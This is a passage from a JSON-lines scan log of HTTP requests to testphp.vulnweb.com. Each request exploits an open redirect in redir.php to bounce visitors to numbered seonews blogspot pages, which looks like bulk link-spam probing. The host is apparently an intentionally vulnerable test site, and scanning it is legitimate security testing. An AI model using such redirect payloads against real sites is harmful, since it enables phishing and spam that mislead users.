\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:51.948025148Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1739.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1739.blogspot.com/\",\"location\":\"http://seonews1739.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1739.blogspot.com/\",\"time\":\"339.849656ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:51.980286848Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1740.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1740.blogspot.com/\",\"location\":\"http://seonews1740.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1740.blogspot.com/\",\"time\":\"344.322064ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:52.043387471Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1740.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1740.blogspot.com/management.html\",\"location\":\"http://seonews1740.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1740.blogspot.com/management.html\",\"time\":\"356.581599ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:52.456471659Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1741.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1741.blogspot.com/management.html\",\"location\":\"http://seonews1741.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1741.blogspot.com/management.html\",\"time\":\"350.838689ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:52.852973929Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1742.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1742.blogspot.com/\",\"location\":\"http://seonews1742.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1742.blogspot.com/\",\"time\":\"348.415979ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:52.897081077Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1742.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1742.blogspot.com/management.html\",\"location\":\"http://seonews1742.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1742.blogspot.com/management.html\",\"time\":\"353.998303ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:53.106276243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1744.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1744.blogspot.com/\",\"location\":\"http://seonews1744.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1744.blogspot.com/\",\"time\":\"353.274261ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:53.600816293Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1745.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1745.blogspot.com/management.html\",\"location\":\"http://seonews1745.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1745.blogspot.com/management.html\",\"time\":\"351.170003ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:53.658766257Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1746.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1746.blogspot.com/management.html\",\"location\":\"http://seonews1746.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1746.blogspot.com/management.html\",\"time\":\"351.635961ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:55.358942176Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1747.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1747.blogspot.com/management.html\",\"location\":\"http://seonews1747.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1747.blogspot.com/management.html\",\"time\":\"340.298512ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:56.637861588Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1748.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1748.blogspot.com/management.html\",\"location\":\"http://seonews1748.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1748.blogspot.com/management.html\",\"time\":\"354.443554ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:56.671156779Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1749.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1749.blogspot.com/\",\"location\":\"http://seonews1749.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1749.blogspot.com/\",\"time\":\"352.014347ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:57.001452779Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1749.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1749.blogspot.com/management.html\",\"location\":\"http://seonews1749.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1749.blogspot.com/management.html\",\"time\":\"344.55322ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:57.844005603Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1750.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1750.blogspot.com/\",\"location\":\"http://seonews1750.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1750.blogspot.com/\",\"time\":\"338.664156ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:57.894382025Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1753.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1753.blogspot.com/\",\"location\":\"http://seonews1753.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1753.blogspot.com/\",\"time\":\"348.704745ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:57.909695854Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1753.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1753.blogspot.com/management.html\",\"location\":\"http://seonews1753.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1753.blogspot.com/management.html\",\"time\":\"342.895386ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:57.929482598Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1754.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1754.blogspot.com/\",\"location\":\"http://seonews1754.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1754.blogspot.com/\",\"time\":\"345.814893ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.26976859Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1754.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1754.blogspot.com/management.html\",\"location\":\"http://seonews1754.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1754.blogspot.com/management.html\",\"time\":\"351.191558ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.273523832Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1755.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1755.blogspot.com/\",\"location\":\"http://seonews1755.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1755.blogspot.com/\",\"time\":\"346.349576ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.350596239Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1758.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1758.blogspot.com/\",\"location\":\"http://seonews1758.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1758.blogspot.com/\",\"time\":\"351.221518ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.376423761Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1758.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1758.blogspot.com/management.html\",\"location\":\"http://seonews1758.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1758.blogspot.com/management.html\",\"time\":\"344.725857ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.408618853Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1759.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1759.blogspot.com/\",\"location\":\"http://seonews1759.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1759.blogspot.com/\",\"time\":\"342.402643ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.507799392Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1759.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1759.blogspot.com/management.html\",\"location\":\"http://seonews1759.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1759.blogspot.com/management.html\",\"time\":\"343.566213ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.562783465Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1760.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1760.blogspot.com/\",\"location\":\"http://seonews1760.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1760.blogspot.com/\",\"time\":\"340.16411ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.598117476Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1760.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1760.blogspot.com/management.html\",\"location\":\"http://seonews1760.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1760.blogspot.com/management.html\",\"time\":\"357.984624ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.669080794Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1764.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1764.blogspot.com/\",\"location\":\"http://seonews1764.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1764.blogspot.com/\",\"time\":\"345.700731ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.765473373Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1764.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1764.blogspot.com/management.html\",\"location\":\"http://seonews1764.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1764.blogspot.com/management.html\",\"time\":\"352.958443ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.838345065Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1767.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1767.blogspot.com/\",\"location\":\"http://seonews1767.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1767.blogspot.com/\",\"time\":\"352.820575ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:58.921840401Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1767.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1767.blogspot.com/management.html\",\"location\":\"http://seonews1767.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1767.blogspot.com/management.html\",\"time\":\"343.445639ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:02.085956994Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1769.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1769.blogspot.com/\",\"location\":\"http://seonews1769.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1769.blogspot.com/\",\"time\":\"350.264791ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:02.312379761Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1769.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1769.blogspot.com/management.html\",\"location\":\"http://seonews1769.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1769.blogspot.com/management.html\",\"time\":\"362.215793ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:02.331252816Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1770.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1770.blogspot.com/\",\"location\":\"http://seonews1770.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1770.blogspot.com/\",\"time\":\"347.25391ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:02.403862785Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1770.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1770.blogspot.com/management.html\",\"location\":\"http://seonews1770.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1770.blogspot.com/management.html\",\"time\":\"356.372779ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:02.809737435Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1771.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1771.blogspot.com/\",\"location\":\"http://seonews1771.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1771.blogspot.com/\",\"time\":\"348.883717ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:03.209138973Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1771.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1771.blogspot.com/management.html\",\"location\":\"http://seonews1771.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1771.blogspot.com/management.html\",\"time\":\"352.689506ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:03.260542262Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1772.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1772.blogspot.com/\",\"location\":\"http://seonews1772.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1772.blogspot.com/\",\"time\":\"358.4781ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:03.453638442Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1772.blogspot.com/management.html\",\"input\":\"http://t